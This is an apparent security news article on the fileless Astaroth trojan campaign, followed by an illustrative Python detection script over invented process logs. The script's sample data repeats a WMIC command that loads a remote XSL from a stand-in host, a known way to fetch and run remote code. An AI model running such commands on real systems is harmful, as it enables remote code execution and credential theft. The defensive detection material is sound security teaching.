In a recent blog post, the Microsoft Defender ATP research team warned about a fileless malware campaign delivering the Astaroth trojan.
The team was alerted by a sudden, large spike in the use of the WMIC (Windows Management Instrumentation Command-line) tool during May and June 2019, picked up by an algorithm they had deployed to catch a specific form of fileless attack.
They soon traced the spike to a campaign in which spam emails sent to users carried a link to a website hosting a .LNK shortcut file.
When the downloaded shortcut is opened, it launches WMIC and other built-in tools, which carry out the later stages of the attack and ultimately download the Astaroth trojan. The trojan is known for stealing credentials from applications and exfiltrating them to remote servers.
Astaroth was previously detected in 2018 and again earlier this year, when it targeted users in Brazil and Europe. According to ZDNet, Microsoft researchers said that this time, too, around 90% of Astaroth infections occurred in Brazil, and that the malware used almost the same tools as in previous instances.
The big concern with Astaroth is that it is fileless: apart from the initial shortcut, no malicious executable is written to disk, and the payloads run entirely in system memory. That deprives antivirus and other file-scanning security tools of the artifacts they would normally detect and act on.
Astaroth also takes a "living-off-the-land" approach: almost all of the tools it uses are legitimate system utilities already present on the target machine, so its activity blends into normal administrative use and has to be spotted from behaviour (which process launched which tool, with what arguments, and how often) rather than from the presence of the tools themselves.
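The detection approach described above, usage of a legitimate tool spiking above its baseline and a user-facing process (the shortcut being opened) launching WMIC, can be illustrated with a small script run over process-creation telemetry. The following is an added example written for this article, not Microsoft's detection logic. The pipe-separated log format, the host names, and the sample events are constructed for the demo; the two per-event indicators (wmic.exe spawned by explorer.exe, and a WMIC command line that references a remote http(s) resource) are my assumptions about what such a chain looks like, not indicators the article itself lists.

```python
"""Toy detection over constructed process-creation events (added example).

Log format (invented for this demo), one event per line:
    date|host|parent_image|image|command_line
"""
from collections import Counter
from statistics import median

# Constructed sample events, not real telemetry. The first days show a normal
# admin baseline of wmic.exe launched from cmd.exe/powershell.exe; the last day
# shows a spike in which wmic.exe is launched from explorer.exe with a remote
# resource on its command line (assumed indicator for a shortcut-triggered run).
SAMPLE_LOG = """\
2019-05-01|ws01|cmd.exe|wmic.exe|wmic os get caption
2019-05-01|ws02|cmd.exe|wmic.exe|wmic bios get serialnumber
2019-05-02|ws01|cmd.exe|wmic.exe|wmic logicaldisk get size
2019-05-03|ws03|powershell.exe|wmic.exe|wmic product get name
2019-05-03|ws01|explorer.exe|notepad.exe|notepad.exe report.txt
2019-05-04|ws02|cmd.exe|wmic.exe|wmic cpu get name
2019-05-05|ws01|explorer.exe|wmic.exe|wmic os get /format:"https://example.invalid/x.xsl"
2019-05-05|ws02|explorer.exe|wmic.exe|wmic os get /format:"https://example.invalid/x.xsl"
2019-05-05|ws03|explorer.exe|wmic.exe|wmic os get /format:"https://example.invalid/x.xsl"
2019-05-05|ws04|explorer.exe|wmic.exe|wmic os get /format:"https://example.invalid/x.xsl"
2019-05-05|ws05|explorer.exe|wmic.exe|wmic os get /format:"https://example.invalid/x.xsl"
2019-05-05|ws06|cmd.exe|wmic.exe|wmic cpu get name
"""


def parse_events(text):
    """Parse the demo log format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, host, parent, image, cmdline = line.split("|", 4)
        events.append({"date": date, "host": host, "parent": parent.lower(),
                       "image": image.lower(), "cmdline": cmdline})
    return events


def daily_counts(events, image="wmic.exe"):
    """Number of launches of `image` per day, sorted by date."""
    counts = Counter(e["date"] for e in events if e["image"] == image)
    return dict(sorted(counts.items()))


def spike_days(counts, factor=3.0, min_history=2):
    """Flag days whose count is >= factor * median of all earlier days.

    Returns (date, count, baseline_median) tuples. Days with fewer than
    `min_history` earlier days are never flagged (no baseline yet).
    """
    flagged, history = [], []
    for date, n in sorted(counts.items()):
        if len(history) >= min_history and n >= factor * max(median(history), 1):
            flagged.append((date, n, median(history)))
        history.append(n)
    return flagged


def suspicious_launches(events):
    """Per-event indicators for wmic.exe (assumed indicators, see lead-in)."""
    hits = []
    for e in events:
        if e["image"] != "wmic.exe":
            continue
        reasons = []
        if e["parent"] == "explorer.exe":
            reasons.append("spawned by explorer.exe (user opened a file or shortcut)")
        cmd = e["cmdline"].lower()
        if "http://" in cmd or "https://" in cmd:
            reasons.append("command line references a remote resource")
        if reasons:
            hits.append((e["date"], e["host"], reasons))
    return hits


if __name__ == "__main__":
    evts = parse_events(SAMPLE_LOG)
    for date, n, base in spike_days(daily_counts(evts)):
        print(f"spike: {date} had {n} wmic.exe launches (baseline median {base})")
    for date, host, reasons in suspicious_launches(evts):
        print(f"suspicious: {date} {host}: {'; '.join(reasons)}")
```

The volume check alone only tells you that something changed; the per-event indicators tell you which hosts to look at first. In practice the baseline would come from weeks of telemetry rather than four days, and the parent-process check would be one of several (signed-binary provenance, unusual network destinations, child processes of WMIC), but the structure is the same: the tool is legitimate, so the signal has to come from how, by whom, and how often it is run.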